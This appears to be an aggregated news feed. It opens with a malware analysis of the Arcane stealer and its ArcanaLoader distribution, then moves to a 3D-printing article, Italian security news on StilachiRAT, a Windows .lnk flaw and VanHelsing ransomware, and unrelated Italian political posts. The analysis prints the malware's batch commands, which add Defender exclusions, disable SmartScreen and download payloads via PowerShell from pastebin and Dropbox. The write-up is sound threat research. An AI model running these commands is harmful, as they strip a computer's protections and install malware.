Arcane stealer: We want all your data
At the end of 2024, we discovered a new stealer distributed via YouTube videos promoting game cheats. What’s intriguing about this malware is how much it collects. It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla and DynDNS. The stealer was named Arcane, not to be confused with the well-known Arcane Stealer V. The malicious actor behind Arcane went on to release a similarly named loader, which supposedly downloads cheats and cracks, but in reality delivers malware to the victim’s device.
Distribution
The campaign in which we discovered the new stealer was already active before Arcane appeared. The original distribution method started with YouTube videos promoting game cheats. The videos were frequently accompanied by a link to an archive and a password to unlock it. Upon unpacking the archive, the user would invariably discover a start.bat batch file in the root folder and the UnRAR.exe utility in one of the subfolders.
Contents of the “natives” subfolder
The contents of the batch file were obfuscated. Its only purpose was to download another password-protected archive via PowerShell, and unpack that with UnRAR.exe with the password embedded in the BATCH file as an argument.
Contents of the obfuscated start.bat file
Following that, start.bat would use PowerShell to launch the executable files from the archive. While doing so, it added every drive root folder to SmartScreen filter exceptions. It then reset the EnableWebContentEvaluation and SmartScreenEnabled registry keys via the system console utility reg.exe to disable SmartScreen altogether.
powershell -Command "Get-PSDrive -PSProvider FileSystem | ForEach-Object {Add-MpPreference -ExclusionPath $_.Root}"
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\AppHost" /v "EnableWebContentEvaluation" /t REG_DWORD /d 0 /f
reg add "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
powershell -Command "(New-Object Net.WebClient).DownloadString(\'https://pastebin.com/raw/<redacted>\')"
powershell -Command "(New-Object Net.WebClient).DownloadFile(\'https://www.dropbox.com/scl/fi/<redacted>/black.rar?rlkey=<redacted>&st=<redacted>&dl=1\', \'C:\\Users\\<redacted>\\AppData\\Local\\Temp\\black.rar\')"
Key commands run by start.bat
The archive would always contain two executables: a miner and a stealer.
Contents of the downloaded archive
The stealer was a Phemedrone Trojan variant, rebranded by the attackers as “VGS”. They used this name in the logo, which, when generating stealer activity reports, is written to the beginning of the file along with the date and time of the report’s creation.
Arcane replaces VGS
At the end of 2024, we discovered a new Arcane stealer distributed as part of the same campaign. It is worth noting that a stealer with a similar name has been encountered before: a Trojan named “Arcane Stealer V” was offered on the dark web in 2019, but it shares little with our find. The new stealer takes its name from the ASCII art in the code.
Arcane succeeded VGS in November. Although much of it was borrowed from other stealers, we could not attribute it to any of the known families.
Arcane gets regular updates, so its code and capabilities change from version to version. We will describe the common functionality present in various modifications and builds. In addition to logins, passwords, credit card data, tokens and other credentials from various Chromium and Gecko-based browsers, Arcane steals configuration files, settings and account information from the following applications:
- VPN clients: OpenVPN, Mullvad, NordVPN, IPVanish, Surfshark, Proton, hidemy.name, PIA, CyberGhost, ExpressVPN
- Network clients and utilities: ngrok, Playit, Cyberduck, FileZilla, DynDNS
- Messaging apps: ICQ, Tox, Skype, Pidgin, Signal, Element, Discord, Telegram, Jabber, Viber
- Email clients: Outlook
- Gaming clients and services: Riot Client, Epic, Steam, Ubisoft Connect (ex-Uplay), Roblox, Battle.net, various Minecraft clients
- Crypto wallets: Zcash, Armory, Bytecoin, Jaxx, Exodus, Ethereum, Electrum, Atomic, Guarda, Coinomi
In addition, the stealer collects all kinds of system information, such as the OS version and installation date, digital key for system activation and license verification, username and computer name, location, information about the CPU, memory, graphics card, drives, network and USB devices, and installed antimalware and browsers. Arcane also takes screenshots of the infected device, obtains lists of running processes and Wi-Fi networks saved in the OS, and retrieves the passwords for those networks.
Arcane’s functionality for stealing data from browsers warrants special attention. Most browsers generate unique keys for encrypting sensitive data they store, such as logins, passwords, cookies, etc. Arcane uses the Data Protection API (DPAPI) to obtain these keys, which is typical of stealers. But Arcane also contains an executable file of the Xaitax utility, which it uses to crack browser keys. To do this, the utility is dropped to disk and launched covertly, and the stealer obtains all the keys it needs from its console output.
The stealer implements an additional method for extracting cookies from Chromium-based browsers through a debug port. The Trojan secretly launches a copy of the browser with the “remote-debugging-port” argument, then connects to the debug port, issues commands to visit several sites, and requests their cookies. The list of resources it visits is provided below.
- gmail.com,
- drive.google.com,
- photos.google.com,
- mail.ru,
- rambler.ru,
- steamcommunity.com,
- youtube.com,
- avito.ru,
- ozon.ru,
- twitter.com,
- roblox.com,
- passport.yandex.ru
ArcanaLoader
Within a few months of discovering the stealer, we noticed a new distribution pattern. Rather than promoting cheats, the threat actors shifted to advertising ArcanaLoader on their YouTube channels. This is a loader with a graphical user interface for downloading and running the most popular cracks, cheats and other similar software. More often than not, the links in the videos led to an executable file that downloaded an archive with ArcanaLoader.
See translation
Читы | Cheats |
Настройки | Settings |
Клиенты с читами | Clients with cheats |
Все версии | All versions |
Введите название чита | Enter cheat name |
Версия: 1.16.5 | Version: 1.16.5 |
Запустить | Start |
Версия: Все Версии | Version: All versions |
The loader itself included a link to the developers’ Discord server, which featured channels for news, support and links to download new versions.
See translation
You have been invited to Arcana Loader
548 online
3,156 users
Accept invitation
At the same time, one of the Discord channels posted an ad, looking for bloggers to promote ArcanaLoader.
Looking for bloggers to spread the loader
See translation
ArcanaLoader BOT
Form:
1. Total subscribers
2. Average views per week
3. Link to ArcanaLoader video
4. Screenshot proof of channel ownership
YOUTUBE
Criteria:
1. 600* subscribers
2. 1,500+ views
3. Links to 2 Arcana Loader videos
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
3. Add cheat to loader without delay
4. Access to @everyone in the #MEDIA chat
5. Possible compensation in rubles for high traffic
MEDIA
Criteria:
1. 50+ subscribers
2. 150+ views
3. Link to 1 ArcanaLoader video
Permissions:
1. Send your videos to the #MEDIA chat
2. Personal server role
Sadly, the main ArcanaLoader executable contained the aforementioned Arcane stealer.
Victims
All conversations on the Discord server are in Russian, the language used in the news channels and YouTube videos. Apparently, the attackers target a Russian-speaking audience. Our telemetry confirms this assumption: most of the attacked users were in Russia, Belarus and Kazakhstan.
Takeaways
Attackers have been using cheats and cracks as a popular trick to spread all sorts of malware for years, and they’ll probably keep doing so. What’s interesting about this particular campaign is that it illustrates how flexible cybercriminals are, always updating their tools and the methods of distributing them. Besides, the Arcane stealer itself is fascinating because of all the different data it collects and the tricks it uses to extract the information the attackers want. To stay safe from these threats, we suggest being wary of ads for shady software like cheats and cracks, avoiding links from unfamiliar bloggers, and using strong security software to detect and disarm rapidly evolving malware.
Make Fancy Resin Printer 3D Models FDM-Friendly
Do you like high-detail 3D models intended for resin printing, but wish you could more easily print them on a filament-based FDM printer? Good news, because [Jacob] of Painted4Combat shared a tool he created to make 3D models meant for resin printers — the kind popular with tabletop gamers — easier to port to FDM. It comes in the form of a Blender add-on called Resin2FDM. Intrigued, but wary of your own lack of experience with Blender? No problem, because he also made a video that walks you through the whole thing step-by-step.Resin2FDM separates the model from the support structure, then converts the support structure to be FDM-friendly.
3D models intended for resin printing aren’t actually any different, format-wise, from models intended for FDM printers. The differences all come down to the features of the model and how well the printer can execute them. Resin printing is very different from FDM, so printing a model on the “wrong” type of printer will often have disappointing results. Let’s look at why that is, to better understand what makes [Jacob]’s tool so useful.
Rafts and a forest of thin tree-like supports are common in resin printing. In the tabletop gaming scene, many models come pre-supported for convenience. A fair bit of work goes into optimizing the orientation of everything for best printed results, but the benefits don’t carry directly over to FDM.
For one thing, supports for resin prints are usually too small for an FDM printer to properly execute — they tend to be very thin and very tall, which is probably the least favorable shape for FDM printing. In addition, contact points where each support tapers down to a small point that connects to the model are especially troublesome; FDM slicer software will often simply consider those features too small to bother trying to print. Supports that work on a resin printer tend to be too small or too weak to be effective on FDM, even with a 0.2 mm nozzle.
To solve this, [Jacob]’s tool allows one to separate the model itself from the support structure. Once that is done, the tool further allows one to tweak the nest of supports, thickening them up just enough to successfully print on an FDM printer, while leaving the main model unchanged. The result is a support structure that prints well via FDM, allowing the model itself to come out nicely, with a minimum of alterations to the original.
Resin2FDM is available in two versions, the Lite version is free and an advanced version with more features is available to [Jacob]’s Patreon subscribers. The video (embedded below) covers everything from installation to use, and includes some general tips for best results. Check it out if you’re interested in how [Jacob] solved this problem, and keep it in mind for the next time you run across a pre-supported model intended for resin printing that you wish you could print with FDM.
youtube.com/embed/zZp-CLhH1Ao?…
StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia!
Un nuovo pericoloso Remote Access Trojan (RAT) altamente sofisticato, denominato StilachiRAT, sta circolando con l’obiettivo di sottrarre credenziali, dati sensibili e criptovalute. Questo malware utilizza tecniche avanzate di evasione per rimanere inosservato, garantire la persistenza e permettere ai cybercriminali di operare indisturbati.
Un RAT su misura per lo spionaggio e il furto
Scoperto a novembre 2024 dai ricercatori di Microsoft Incident Response, StilachiRAT si distingue per la sua capacità di infiltrarsi nei sistemi target senza destare sospetti.
Tra le sue principali funzioni troviamo:
- Furto di credenziali: estrae informazioni sensibili salvate nei browser, inclusi i dati delle criptovalute.
- Monitoraggio dell’attività utente: raccoglie dati di sistema, rileva la presenza di telecamere, analizza sessioni RDP attive e le applicazioni in esecuzione.
- Attacco alle criptovalute: scansiona la configurazione di oltre 20 wallet digitali, tra cui Coinbase Wallet, Metamask e Trust Wallet.
- Persistenza e movimento laterale: sfrutta Windows Service Control Manager per rimanere attivo e persiste anche dopo tentativi di rimozione.
Attacco silenzioso e pericoloso
StilachiRAT non si limita a raccogliere informazioni, ma implementa anche funzionalità avanzate per evitare il rilevamento:
- Cancellazione dei log di sistema: elimina tracce dell’attacco per impedire indagini forensi.
- Evasione da sandbox: utilizza chiamate API offuscate per rendere l’analisi più complessa.
- Manipolazione delle finestre di sistema: monitora l’attività dell’utente per carpire password e dati sensibili direttamente dallo schermo.
Una volta insediato, StilachiRAT permette ai criminali di controllare il dispositivo infetto tramite comandi da un server C2. Questi comandi includono:
- Esecuzione di applicazioni malevole;
- Riavvio o sospensione del sistema;
- Modifica di chiavi di registro di Windows;
- Creazione di proxy per camuffare il traffico malevolo.
Difendersi è possibile
Sebbene Microsoft non abbia ancora attribuito StilachiRAT a un gruppo specifico, la sua pericolosità è evidente. Per ridurre il rischio di infezione, è essenziale adottare alcune contromisure:
- Scaricare software esclusivamente da fonti ufficiali;
- Utilizzare soluzioni di sicurezza avanzate che blocchino domini e allegati sospetti;
- Monitorare le sessioni RDP e implementare autenticazione a più fattori;
- Effettuare controlli di sicurezza regolari per individuare attività anomale.
Conclusione
Il panorama delle minacce informatiche non mostra segni di rallentamento e StilachiRAT ne è l’ennesima dimostrazione. Questo malware rappresenta un rischio concreto per aziende e utenti, con il suo focus su credenziali, criptovalute e accessi remoti. La difesa efficace passa attraverso la consapevolezza e l’adozione di misure di sicurezza mirate. L’informazione e la prevenzione sono le armi più potenti contro queste minacce in continua evoluzione.
L'articolo StilachiRAT: il malware fantasma che ruba credenziali e criptovalute senza lasciare traccia! proviene da il blog della sicurezza informatica.
Corso per docenti della scuola secondaria di primo grado: Leggere per Crescere
@Politica interna, europea e internazionale
UN LIBRO CONTRO IL DETERIORAMENTO CEREBRALE. LE SOLUZIONI DELLA SCUOLA AL BRAIN-ROT DELL’ERA DIGITALE. Il corso si propone di: dotare i docenti di strumenti pratici e teorici per comprendere il funzionamento del cervello umano durante la lettura
Politica interna, europea e internazionale reshared this.
8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT
Il team di threat hunting di Trend Zero Day Initiative™ (ZDI) ha identificato casi significativi di sfruttamento di un bug di sicurezza in una serie di campagne risalenti al 2017. L’analisi ha rivelato che 11 gruppi sponsorizzati da stati provenienti da Corea del Nord, Iran, Russia e Cina hanno impiegato il bug monitorato con il codice ZDI-CAN-25373 in operazioni motivate principalmente da cyber spionaggio e furto di dati.
Trendmicro ha scoperto quasi mille campioni Shell Link (.lnk) che sfruttano ZDI-CAN-25373; tuttavia, è probabile che il numero totale di tentativi di sfruttamento sia molto più alto. Successivamente, i ricercatori hanno inviato un exploit proof-of-concept tramite il programma bug bounty di Trend ZDI a Microsoft, che ha rifiutato di risolvere questa vulnerabilità con una patch di sicurezza.
Numero di campioni da gruppi APT che sfruttano ZDI-CAN-25373 (fonte TrendMicro)
La vulnerabilità, identificata come ZDI-CAN-25373, consente agli aggressori di eseguire comandi dannosi nascosti sui computer delle vittime sfruttando file di collegamento di Windows (.lnk) appositamente creati. Questa falla di sicurezza influisce sul modo in cui Windows visualizza il contenuto dei file di collegamento tramite la sua interfaccia utente. Quando gli utenti esaminano un file .lnk compromesso, Windows non riesce a visualizzare i comandi dannosi nascosti al suo interno, nascondendo di fatto il vero pericolo del file.
Ad oggi sono stati scoperti quasi 1.000 artefatti del file .LNK che sfruttano ZDI-CAN-25373, la maggior parte dei quali è collegata a Evil Corp (Water Asena), Kimsuky (Earth Kumiho), Konni (Earth Imp), Bitter (Earth Anansi) e ScarCruft (Earth Manticore).
Degli 11 attori di minacce sponsorizzati dallo stato che sono stati scoperti ad abusare della falla, quasi la metà di loro proviene dalla Corea del Nord. Oltre a sfruttare la falla in vari momenti, la scoperta serve come indicazione di collaborazione incrociata tra i diversi cluster di minacce che operano all’interno dell’apparato informatico di Pyongyang.
Paesi di origine APT che hanno sfruttato ZDI-CAN-25373 (fonte TrendMicro)
Nello specifico, il bug comporta l’aggiunta degli argomenti con i caratteri di spazio (0x20), tabulazione orizzontale (0x09), avanzamento riga (0x0A), tabulazione verticale (\x0B), avanzamento pagina (\x0C) e ritorno a capo (0x0D) per eludere il rilevamento.
I dati di telemetria indicano che governi, enti privati, organizzazioni finanziarie, think tank, fornitori di servizi di telecomunicazione e agenzie militari/difesa situate negli Stati Uniti, in Canada, Russia, Corea del Sud, Vietnam e Brasile sono diventati i principali obiettivi degli attacchi che sfruttano questa vulnerabilità.
Negli attacchi analizzati da ZDI, i file .LNK fungono da veicolo di distribuzione per famiglie di malware note come Lumma Stealer, GuLoader e Remcos RAT, tra gli altri. Tra queste campagne, degna di nota è lo sfruttamento di ZDI-CAN-25373 da parte di Evil Corp.
Vale la pena notare che .LNK è tra le estensioni di file pericolose bloccate nei prodotti microsoft come Outlook, Word, Excel, PowerPoint e OneNote. Di conseguenza, il tentativo di aprire tali file scaricati dal Web avvia automaticamente un avviso di sicurezza che consiglia agli utenti di non aprire file da fonti sconosciute.
L'articolo 8 Anni di Sfruttamento! Il Bug 0day su Microsoft Windows Che Ha Alimentato 11 Gruppi APT proviene da il blog della sicurezza informatica.
Gazzetta del Cadavere reshared this.
VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione
Il panorama delle minacce ransomware è in costante evoluzione, con gruppi sempre più strutturati che adottano strategie sofisticate per massimizzare il profitto. VanHelsing è un nuovo attore che si sta posizionando nel mercato del Ransomware-as-a-Service (RaaS), un modello che consente anche a cybercriminali con competenze limitate di condurre attacchi avanzati grazie a una piattaforma automatizzata.
Dopo l’annuncio del 23 febbraio 2025 sul forum underground riguardante il programma di affiliazione VanHelsing RaaS, il gruppo ransomware ha ufficialmente pubblicato la prima possbile vittima sul proprio Data Leak Site (DLS).
A meno di un mese dal lancio, la comparsa della prima organizzazione colpita conferma che il gruppo ha iniziato ad operare attivamente. Sebbene il DLS sia ancora scarno, il debutto di una vittima suggerisce che gli affiliati stiano già distribuendo il ransomware e che il numero di attacchi potrebbe aumentare rapidamente.
VanHelsing RaaS: Un Programma Strutturato per gli Affiliati
L’annuncio del 23 febbraio ha rivelato dettagli significativi sul funzionamento del programma VanHelsing RaaS, che si distingue per una strategia di reclutamento selettivo e strumenti avanzati.
Punti chiave del programma di affiliazione:
- Ingresso su invito: gli affiliati con una reputazione consolidata nel cybercrime possono aderire gratuitamente.
- Quota di ingresso per nuovi affiliati: chi non ha una reputazione pregressa deve pagare $5.000 per accedere alla piattaforma.
- Strumenti avanzati: accesso a un pannello web, un sistema di chat privato, un locker per chiavi di cifratura, strumenti di esfiltrazione dati e funzionalità di attacco ransomware automatizzate.
- Revenue sharing: gli affiliati trattengono l’80% del riscatto, mentre VanHelsing trattiene il 20%.
- Escrow su blockchain: i fondi vengono rilasciati dopo due conferme, riducendo i rischi di frode tra affiliati e sviluppatori.
- Crittografia avanzata: utilizzo di protocolli di cifratura di alto livello per rendere il ransomware resiliente alle contromisure.
- Automazione completa: il ransomware è interamente gestito tramite il pannello di controllo, eliminando errori operativi e riducendo la necessità di intervento manuale.
La Prima Possibile Vittima Pubblicata sul DLS
La prima possibile organizzazione colpita da VanHelsing RaaS opera nel settore pubblico, con funzioni amministrative Questo suggerisce che il gruppo potrebbe prendere di mira enti governativi, municipalità o servizi pubblici, categorie spesso vulnerabili a ransomware.
L’attacco sembra seguire una strategia di doppia estorsione, con un countdown di 10 giorni prima della pubblicazione dei dati esfiltrati. Questo lascia intendere che il gruppo stia negoziando un riscatto con l’ente colpito, cercando di massimizzare il profitto prima di rendere pubbliche eventuali informazioni sensibili.
Anatomia del DLS
Al momento, il DLS di VanHelsing contiene una sola possibile vittima, il che potrebbe indicare diverse possibilità:
- Il gruppo sta testando l’infrastruttura prima di pubblicare attacchi su larga scala.
- Ci sono altre vittime in fase di negoziazione, che non sono ancora state elencate nel DLS.
- Gli affiliati stanno ancora adottando il ransomware, e il numero di attacchi potrebbe aumentare esponenzialmente nelle prossime settimane.
L’esperienza con altri gruppi RaaS dimostra che il numero di vittime può crescere rapidamente man mano che nuovi cybercriminali iniziano ad utilizzare il servizio.
VanHelsing Chat: La Piattaforma di Comunicazione Privata
Un altro elemento distintivo di VanHelsing è la presenza di un portale di chat privato, accessibile solo tramite un Session ID. Questa piattaforma suggerisce che il gruppo gestisce direttamente le negoziazioni con le vittime e le comunicazioni con gli affiliati, senza affidarsi a strumenti pubblici come Telegram o forum underground.
L’adozione di una chat privata offre diversi vantaggi operativi:
- Maggiore sicurezza → Riduce il rischio di infiltrazioni da parte delle forze dell’ordine o di ricercatori di cybersecurity.
- Gestione diretta delle richieste di riscatto → Le vittime possono comunicare direttamente con il team di VanHelsing o con l’affiliato responsabile dell’attacco.
- Coordinamento degli affiliati → I membri del programma RaaS possono ricevere supporto tecnico e aggiornamenti operativi in tempo reale.
Questa infrastruttura è indicativa di un gruppo ransomware che punta a una gestione centralizzata e professionale degli attacchi, un elemento distintivo rispetto a operatori meno organizzati.
Conclusioni
L’emergere di VanHelsing RaaS rappresenta un’ulteriore evoluzione del modello ransomware, con un’infrastruttura altamente scalabile e strumenti avanzati per affiliati. La loro attenzione all’automazione e alla sicurezza operativa suggerisce che potremmo assistere a un aumento degli attacchi nei prossimi mesi, con impatti significativi su aziende e infrastrutture critiche.
L'articolo VanHelsing RaaS: Un Nuovo Modello di Ransomware-as-a-Service in Espansione proviene da il blog della sicurezza informatica.
Ddl Sicurezza, l’allarme delle opposizioni: “Troppi poteri ai Servizi segreti e schedature di massa”
@Politica interna, europea e internazionale
Le Commissioni Affari Costituzionali e Giustizia del Senato hanno approvato il contestato articolo 31 del nuovo ddl Sicurezza. Il via libera chiude l’esame degli emendamenti al disegno di legge, che – presentato dal Governo e già approvato dalla Camera lo
Politica interna, europea e internazionale reshared this.
Mettetevi nei panni di un bambino palestinese e provate a capire cosa si prova a non avere più speranza, a non fidarsi più di nessuno. Mettetevi in una condizione di vita nella quale un popolo, quello israeliano sionista, vi consideri meno di bestie, decida quanta acqua potete bere, quanta corrente elettrica potete consumare. Mettetevi nei panni di un contadino della Cisgiordania che si vede tagliare con la motosega tutti gli olivi secolari da coloni invasati che non hanno niente di dissimile dai nostrani fascisti del ventennio. Mettetevi nei suoi panni quando deve subire le provocazioni senza potere reagire.
Moltiplicate questo per 365 giorni all’anno. Mettetevi nei panni di un ragazzino o un bambino che sta vivendo il genocidio del suo popolo nell’indifferenza generale. Mettetevi nei panni degli orfani, di chi al posto della casa, della via e del quartiere ora guarda una distesa disperata di macerie. Guardateli i potenti della terra ridere e scherzare con la tua vita tra le loro mani.
Mettevi nei panni di un palestinese che, sbagliando in modo colossale, si convinca che il fondamentalismo islamico sia la risposta a tanta violenza, (non capendo, colpevolmente, di avere a che fare con spudorati assassini della stessa identica matrice di quegli altri). Mettetevi nei panni di un palestinese senza più via d’uscita, senza speranza, senza futuro.
Niente possiamo noi pacifisti, niente possono gli israeliani sani, niente possono gli organismi internazionali e niente può la giustizia terrena e divina.
Il conflitto ha causato più di 70.000 morti dei quali circa 50.000 bambini e donne.
Questi sono stati sistematicamente sterminati grazie alle armi americane e alla colpevole e volontaria distrazione occidentale.
Lo stesso occidente conservatore, per mano americana, ha disarmato l’Onu, unico attore in grado di intervenire.
Netanyahu insieme ai generali del IDF sono indagati per evidenti crimini di guerra.
Nonostante questo viene riconosciuto come uno statista.
Trump, nel suo delirio di onnipotenza, vede Gaza israeliana e senza palestinesi.
Vale la pena ricordare che essere palestinesi non significa essere di Hamas.
Vale la pena ricordare che niente può giustificare l'omicidio di bambini.
Hamas, nonostante le perdite e la distruzione delle infrastrutture, è ancora in grado di gestire gli ostaggi e di vantarsi della propria bestialità.
L'operazione militare israeliana, relativamente alla risoluzione della tragedia degli ostaggi, è quindi un sostanziale fallimento. Invece, per quello che riguarda la persecuzione e l'impostazione di un moderno genocidio, uno grottesco successo.
I coloni, ignorando qualunque legge internazionale, hanno mano totalmente libera di commettere qualunque nefandezza.
Complessivamente stiamo assistendo a un inedito “colpo di stato (dei diritti) globale” da parte di una pletora di oligarchi che manipolano gruppi, movimenti e partiti uniti dalla convergenza di interessi (perlopiù economici).
Esiste quindi un “nuovo” asse iper-conservatore che mira al controllo globale bypassando ogni regola democratica.
Questi, al pari del nazi-fascismo, sono dalla parte sbagliata della storia.
Così come ieri sarei stato, senza neanche un dubbio, dalla parte degli ebrei, degli zingari e di qualsiasi minoranza perseguitata dal nazi fascismo. Oggi lo sono, senza se e senza ma, dalla parte dei popoli perseguitati dalla fame, guerra, dalla parte dei più deboli.
Non è un buon momento.
Valerio Perla reshared this.
IlBlues.org: Michele Dal Lago e Giusi Pesenti – un viaggio musicale
ilblues.org/michele-dal-lago-e…
Draghi bacchetta i parlamentari e chiude l’audizione: “Vedo che guardate l’orologio, quindi vi ringrazio” | VIDEO
@Politica interna, europea e internazionale
L’ex presidente del Consiglio Mario Draghi ha bacchettato i parlamentari in chiusura della sua audizione davanti alle Commissioni Unione europea, Bilancio e Industria e Agricoltura del Senato e Bilancio, Attività produttive e Politiche
Politica interna, europea e internazionale reshared this.
La manifestazione pro-Europa è stata pagata dal Comune di Roma. La Lega: “Presentiamo un esposto”
@Politica interna, europea e internazionale
La manifestazione pro-Europa che si è tenuta sabato scorso in piazza del Popolo a Roma è stata finanziata con fondi pubblici del Comune di Roma: l’esborso si aggira sui 270mila euro, tra allestimenti, logistica, servizio d’ordine e pulizia. Lo conferma
reshared this
Gaza. Israele scatena l’inferno promesso
@Notizie dall'Italia e dal mondo
Violenti bombardamenti su tutta la Striscia da nord a sud, senza preavviso. 150 bambini tra le vittime. Per Tel Aviv «è solo l’inizio». Colpite le case danneggiate dentro cui si riparavano intere famiglie, scuole-rifugio e tende per sfollatihttps://pagineesteri.it/2025/03/19/medioriente/gaza-israele-scatena-linferno-promesso/
Notizie dall'Italia e dal mondo reshared this.
Dovremmo imparare a goderci le cose che abbiamo, come se sapessimo che il giorno dopo ce le porterà via. Ma l'incapacità di apprezzare il momento è più forte e così, niente, perdiamo attimi che non avremo mai più.
Auguri papà.
Gcap e cooperazione nella Difesa europea. Il momento di agire è ora
@Notizie dall'Italia e dal mondo
Per molto tempo abbiamo pensato che non sarebbe successo nulla in Europa, ci siamo preparati a operare in missioni di peacekeeping lontano dai nostri confini e senza una minaccia diretta ai nostri territori. Tutto questo è cambiato con l’invasione russa dell’Ucraina, che è servita da
Notizie dall'Italia e dal mondo reshared this.
“La Germania è tornata”
@Notizie dall'Italia e dal mondo
Berlino archivia l'austerità in nome del riarmo, pensa alla leva obbligatoria e droga l'economia con centinaia di miliardi di euro di finanziamenti pubblici a debito
L'articolo “La Germania è tornata” proviene da Pagine Esteri.
Notizie dall'Italia e dal mondo reshared this.
Scoperto in Cina il rifugio dalla peggiore estinzione di massa nella storia della Terra
L'estinzione del Permiano è stata la peggiore mai avvenuta sulla faccia della Terra, avendo condannato oltre l'80 % degli esseri viventi.Everyeye Tech
#Gaza, ritorno al massacro
Gaza, ritorno al massacro
La ripresa dei bombardamenti indiscriminati su Gaza nelle prime ore di martedì da parte di Israele è la logica conseguenza degli sforzi delle ultime settimane per affondare la tregua con Hamas firmata lo scorso mese di gennaio.www.altrenotizie.org
Cosa sono gli “incel”
Incel, abbreviazione dell’espressione inglese involuntary celibates (“casti non per scelta”): è utilizzata per definire uomini eterosessuali che non hanno rapporti sessuali perché si sentono discriminati e rifiutati dalle donne, che incolpano di privarli di quello che reputano un loro diritto.
Mecenatismo oggi: tra promozione e valorizzazione dell’arte.
Dal Rinascimento a oggi, il mecenatismo è stato un ponte tra potere, ricchezza e cultura. Oggi, dal report di Avant Arte, vediamo una trasformazione di questo fenomeno: una nuova generazione di collezionisti e mecenati non si limita più a sostenere economicamente musei e istituzioni, ma partecipa attivamente alla diffusione dell’arte. Questo cambiamento porta con sé una riflessione fondamentale: il mecenatismo contemporaneo deve solo promuovere o anche valorizzare?
Promuovere vs valorizzare: una distinzione cruciale
Spesso si usano questi termini come sinonimi, ma hanno significati profondamente diversi. Promuovere significa amplificare la visibilità di un'opera, un artista o un progetto attraverso strategie di comunicazione, marketing e diffusione. È un primo passo importante, ma da solo non garantisce la crescita culturale. Valorizzare, invece, è un processo più profondo: significa riconoscere e accrescere il valore di un’opera, mettendone in luce il significato, inserendola in un contesto che ne amplifichi la portata culturale e sociale.
Se il mecenatismo moderno vuole davvero lasciare un segno, non può limitarsi alla promozione. Deve creare connessioni, contesti e significati che permettano all’arte di avere un impatto duraturo nella società.
Il futuro del mecenatismo
Il modello che emerge dal report di Avant Arte suggerisce che i nuovi collezionisti vogliono essere più coinvolti nel processo creativo e culturale. Questa è una grande opportunità: il mecenatismo non è più solo un privilegio di pochi, ma può diventare un motore collettivo per sostenere e dare valore all’arte contemporanea.
Forse la vera sfida è questa: riusciremo a costruire un mecenatismo che non sia solo un investimento di mercato, ma un atto politico e culturale capace di generare un impatto reale?
artribune.com/professioni-e-pr…
#Arte #mecenatismo #collezionismo #cultura #artecontemporanea
Il report di Avant Arte sui nuovi collezionisti e mecenati dell'arte | Artribune
Secondo l'analisi prodotta annualmente dal marketplace l’88% di questi ha sia le risorse che il desiderio di donare di più ai musei e di sostenerli concretamenteCristina Masturzo (Artribune)
like this
reshared this
Scuola di Liberalismo 2025: Giulio Terzi di Sant’Agata – Anche in politica estera, chi sa conservare non ha paura del futuro
@Politica interna, europea e internazionale
L'articolo Scuola di Liberalismo 2025: Giulio Terzi di Sant’Agata – Anche in politica estera, chi sa conservare non ha paura del futuro proviene da Fondazione
Politica interna, europea e internazionale reshared this.
Von der Leyen annuncia la roadmap per il riarmo europeo entro il 2030. I dettagli
@Notizie dall'Italia e dal mondo
Un’altra settimana di appuntamenti importanti per il futuro della difesa europea. La presidente della Commissione europea, Ursula von der Leyen, rilancia sull’autonomia strategica dell’Unione e annuncia il piano Readiness 2030, una roadmap per rendere
Notizie dall'Italia e dal mondo reshared this.
Draghi: “La difesa comune Ue è un passo obbligato, il riarmo va finanziato con eurobond”
@Politica interna, europea e internazionale
Mario Draghi dice sì al riarmo, ma solo nell’ambito di un piano che porti alla realizzazione di una difesa comune europea. E che sia finanziato non solo dai singoli Stati, ma anche con l’emissione di titoli di debito europei e con il ricorso a capitali privati. L’ex
reshared this
lantidiplomatico.it/dettnews-k…
Usa e Ucraina collaborano sui droni kamikaze. Il progetto Artemis
@Notizie dall'Italia e dal mondo
Le forze armate americane e quelle ucraine sono divenute ancora più vicine, grazie all’ultima iniziativa relativa al comparto unmanned. Il nuovo progetto, chiamato “Artemis”, mira allo sviluppo di loitering munitions (termine tecnico per i sistemi comunemente noti come “droni kamikaze”)
Notizie dall'Italia e dal mondo reshared this.
Cani e gatti ammessi nelle Rsa e nelle strutture sanitarie, in Toscana adesso si può
Via libera della Regione all'accesso degli animali da affezione nelle strutture sanitarie, per migliorare il benessere dei pazienti a lunga degenza
[...]
Per gli ospedali deve essere concordato con il servizio di accoglienza il percorso per raggiungere la saletta di uso comune dove si svolgerà la visita. In ciascuna struttura è consentita la presenza di un solo animale per volta e le visite saranno pianificate per non creare sovrapposizioni. Alcuni reparti sono interdetti: gli animali non potranno accedere al pronto soccorso, a neonatologia, alle aree ambulatoriali, di dialisi, di prelievo e di ristoro, nei day hospital e nelle sale operatorie.
Nicola Pizzamiglio likes this.
UCRAINI MAI ACCERCHIATI NEL KURSK - di Giorgio Provinciali
Pubblicato sul quotidiano La Ragione, edizione del 18 marzo 2025. Le notizie diffuse da Trump hanno come fonte la Russia e non l'intelligence USA.Quora
Odessa e la sentenza della CEDU
La Corte Europea dei Diritti dell'Uomo (CEDU) ha emesso una sentenza il 13 marzo 2025, condannando l'Ucraina per la gestione degli eventi del 2 maggio 2014 a Odessa.maicolengel butac (Butac – Bufale Un Tanto Al Chilo)
REPORTAGE VIDEO. Trump cambia la faccia dei confini dell’America Latina
@Notizie dall'Italia e dal mondo
Tapachula, la più grande città del confine sud tra Messico e Guatemala si è svuotata. Le code davanti agli uffici che permettono di avere i documenti per attraversare il paese o chiedere asilo negli USA non esistono più. Il video-reportage di Andrea Cegna dal
Notizie dall'Italia e dal mondo reshared this.
Oggi Palestina. A Napoli la giornata dedicata al cinema, alla cultura e all’attualità
@Notizie dall'Italia e dal mondo
A Napoli, una giornata dedicata alla Palestina, con proiezioni, testimonianze, presentazioni di libri, musica, incontri e tanto altro. Pagine Esteri, Life for Gaza, Associazione Pixel, Giuristi democratici e n’seaYet hanno organizzato per
Notizie dall'Italia e dal mondo reshared this.
Israele attacca Gaza, centinaia di palestinesi uccisi
